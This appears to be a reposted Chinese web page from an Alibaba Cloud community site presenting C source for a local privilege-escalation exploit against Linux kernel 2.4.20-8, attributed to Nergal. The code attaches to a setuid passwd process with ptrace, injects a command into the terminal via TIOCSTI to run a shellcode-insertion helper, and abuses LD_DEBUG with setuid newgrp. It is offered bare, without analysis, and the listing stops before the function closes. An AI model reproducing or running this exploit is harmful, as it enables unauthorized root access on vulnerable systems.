Linux l 2.4.20-8 # 溢出

來源:互聯網
上載者:User

代碼如下:

/* by Nergal */
#include <stdio.h>
#include <sys/ptrace.h>
#include <fcntl.h>
#include <sys/ioctl.h>
void ex_passwd(int fd)
{
 char z;
 if (read(fd, &z, 1) <= 0) {
  perror("read:");
  exit(1);
 }
 execl("/usr/bin/passwd", "passwd", 0);
 perror("execl");
 exit(1);
}
void insert(int pid)
{
 char buf[100];
 char *ptr = buf;
 sprintf(buf, "exec ./insert_shellcode %i\n", pid);
 while (*ptr && !ioctl(0, TIOCSTI, ptr++));
}

main(int argc, char **argv)
{
 int res, fifo;
 int status;
 int pid, n;
 int pipa[2];
 char buf[1024];
 pipe(pipa);
 switch (pid = fork()) {
 case -1:
  perror("fork");
  exit(1);
 case 0:
  close(pipa[1]);
  ex_passwd(pipa[0]);
 default:;
 } res = ptrace(PTRACE_ATTACH, pid, 0, 0);
 if (res) {
  perror("attach");
  exit(1);
 }
 res = waitpid(-1, &status, 0);
 if (res == -1) {
  perror("waitpid");
  exit(1);
 }
 res = ptrace(PTRACE_CONT, pid, 0, 0);
 if (res) {
  perror("cont");
  exit(1);
 }
 fprintf(stderr, "attached\n");
 switch (fork()) {
 case -1:
  perror("fork");
  exit(1);
 case 0:
  close(pipa[1]);
  sleep(1);
  insert(pid);
  do {
   n = read(pipa[0], buf, sizeof(buf));
  } while (n > 0);
  if (n < 0)
   perror("read");
  exit(0);
 default:;
 }
 close(pipa[0]); dup2(pipa[1], 2);
 close(pipa[1]);
 /* Decrystallizing reason */
 setenv("LD_DEBUG", "libs", 1);
 /* With strength I burn */
 execl("/usr/bin/newgrp", "newgrp", 0);
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.